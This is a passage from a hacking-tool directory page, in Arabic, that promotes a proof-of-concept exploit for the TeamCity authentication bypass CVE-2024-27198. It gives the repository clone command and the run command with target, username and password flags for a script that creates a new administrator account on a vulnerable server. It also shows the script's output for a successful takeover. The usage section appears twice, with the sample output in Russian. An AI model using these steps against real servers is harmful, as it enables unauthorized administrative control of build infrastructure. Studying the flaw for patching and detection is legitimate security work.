Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-27198 — هي أداة إثبات مفهوم (PoC) تستهدف ثغرة أمنية في خادم TeamCity (CVE-2024-27198) | Kitploit
أدوات/GitHubGitHub/geniuszly/cve-2024-27198
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubgeniuszly/cve-2024-27198

CVE-2024-27198

هي أداة إثبات مفهوم (PoC) تستهدف ثغرة أمنية في خادم TeamCity (CVE-2024-27198)

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

EN

GenTeamCityExploit هي أداة PoC تستهدف ثغرة أمنية في خادم TeamCity (CVE-2024-27198). تمكن من اكتشاف إصدار TeamCity وإنشاء مستخدم مسؤول جديد عن طريق استغلال خلل في تجاوز المصادقة.

الميزات

  • استخراج إصدار خادم TeamCity.
  • التحقق من وجود الثغرة المعروفة (CVE-2024-27198).
  • إنشاء مستخدم مسؤول جديد إذا كان الخادم عرضة للثغرة.

المتطلبات الأساسية

  • Python 3.6+: تأكد من تثبيت Python.
  • المكتبات: قم بتثبيت المكتبات المطلوبة باستخدام:
    root@kitploit:~
    pip install requests urllib3
    

الاستخدام

  1. استنساخ المستودع.
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2024-27198
    
  2. الانتقال إلى المجلد.
    root@kitploit:~
    cd CVE-2024-27198
    
  3. تشغيل السكربت مع المعلمات المطلوبة.
    root@kitploit:~
    python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
    
    المعلمات:
    • -t, --target: رابط خادم TeamCity المستهدف.
    • -u, --username: اسم المستخدم للمسؤول الجديد.
    • -p, --password: كلمة المرور للمسؤول الجديد.

مثال

root@kitploit:~
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

مثال على الإخراج

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.

في حال لم يكن الخادم عرضة للثغرة أو لم يتم العثور على الإصدار:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403

إذا حدث خطأ في الاتصال بالخادم:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123

[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))

إخلاء المسؤولية

هذه الأداة مخصصة للأغراض التعليمية فقط ولا ينبغي استخدامها على أي أنظمة دون إذن صريح من المالك. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

RU

GenTeamCityExploit هي أداة PoC تستهدف ثغرة أمنية في خادم TeamCity (CVE-2024-27198). تسمح باكتشاف إصدار TeamCity وإنشاء مسؤول جديد باستخدام ثغرة تجاوز المصادقة.

الميزات

  • استخراج إصدار خادم TeamCity.
  • التحقق من وجود الثغرة المعروفة (CVE-2024-27198).
  • إنشاء مستخدم مسؤول جديد إذا كان الخادم عرضة للثغرة.

المتطلبات

  • Python 3.6+: تأكد من تثبيت Python.
  • المكتبات: قم بتثبيت المكتبات المطلوبة باستخدام:
    root@kitploit:~
    pip install requests urllib3
    

الاستخدام

  1. استنساخ المستودع.
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2024-27198
    
  2. الانتقال إلى مجلد المشروع.
    root@kitploit:~
    cd CVE-2024-27198
    
  3. تشغيل السكربت مع المعلمات الإلزامية.
    root@kitploit:~
    python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
    
    المعلمات:
    • -t, --target: رابط خادم TeamCity المستهدف.
    • -u, --username: اسم المستخدم للمسؤول الجديد.
    • -p, --password: كلمة المرور للمسؤول الجديد.

مثال

root@kitploit:~
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

مثال على الإخراج

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.

في حال لم يكن الخادم عرضة للثغرة أو لم يتم العثور على الإصدار:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403

عند حدوث خطأ في الاتصال بالخادم:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123

[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))

إخلاء المسؤولية

هذه الأداة مخصصة للأغراض التعليمية فقط ولا ينبغي استخدامها على أي أنظمة دون إذن صريح من المالك. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

تنزيل الأداة